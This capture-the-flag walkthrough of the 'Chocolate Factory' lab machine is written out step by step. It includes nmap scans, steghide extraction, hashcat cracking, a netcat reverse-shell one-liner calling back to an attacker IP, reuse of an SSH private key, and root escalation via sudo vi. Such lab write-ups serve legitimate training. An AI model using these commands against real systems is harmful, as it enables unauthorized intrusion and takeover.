Chocolate Factory
Reconnaissance
Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)
nmap -Pn 10.10.46.164
Detailed Nmap Scan :
Command Breakdown:
(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 21,22,80
(-oN nmap): Saving it into a file called nmap
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.46.164
Enumeration
Port 21: FTP
Anonymous login is allowed so lets go check it out
ftp 10.10.46.164
Lets list the files.
Looks like there is one file and it is a image so lets transfer it to our machine
get gum_room.jpg
Lets look at the image
Lets see if there is information hidden in the file, so lets use steghide.
steghide info gum_room.jpg
I hit enter for the passphrase and it worked. We have one file called b64.txt, lets extract it.
steghide --extract -sf gum_room.jpg
Lets read the file
Lets decode it. After decoded this is the output.
We have the password hash for the user Charlie. Lets use hashcat to crack this hash to get the password for Charlie.
Copy the hash into a file called hash.txt.
And now lets use hashcat to crack it.
hashcat -a 0 -m 1800 hash.txt /usr/share/wordlists/rockyou.txt
We found the password: cn7824 , lets try to login through ssh.
Looks like this is not the password for ssh, lets go explore port 80
Port 80: HTTP
Lets visit the website
Its a login page, remember the credentials we found, lets use them to login.
We logged in , looks like we can run commands, and normal commands work so lets run a reverse shell and get a reverse shell, lets first start a netcat listener
nc -lvnp 1234
Lets get a reverse shell from here.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/fLets execute this command, and we get a reverse shell on the machine
Lets stabilize this shell, using these commands
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
reset
Ctrl + C
export TERM=xterm-color
Lets list the files in the current directory
We have a validate.php file, lets read it
We see the credentials we just used to login in the web page. I tried to run the key file but it said permission denied
So I used a command that lets us look at some information which is called strings and it gave me important information
strings key_rev_key
We have a key. With this information we can answer two questions in the room
I was enumerating when I realized that we can change directories into Charlie, so I listed the files and found the user.txt and some other files.
Lets read the teleport file.
Its a rsa private key, we can use this to login as charlie through ssh, lets do that. First copy the contents of the file into a file on your machine called id_rsa.
Now we should change the permissions of the file
chmod 600 id_rsa
Now lets login
ssh -i id_rsa [email protected]
We are logged in.
Privilege Escalation
Lets run sudo -l to see what we can run as root
sudo -l
Looks like we can run /usr/bin/vi as root so lets go to GTFOBins to find the commands to escalate our privilege to root.
Lets run this command
sudo vi -c ':!/bin/sh' /dev/null
We are now root, lets cd into the root folder to find the root flag, it looks like we need to run a python script to get the flag, lets run it, oh its asking for a key, remember when we found the key during enumeration, type that in and you should get the flag
Last updated
Was this helpful?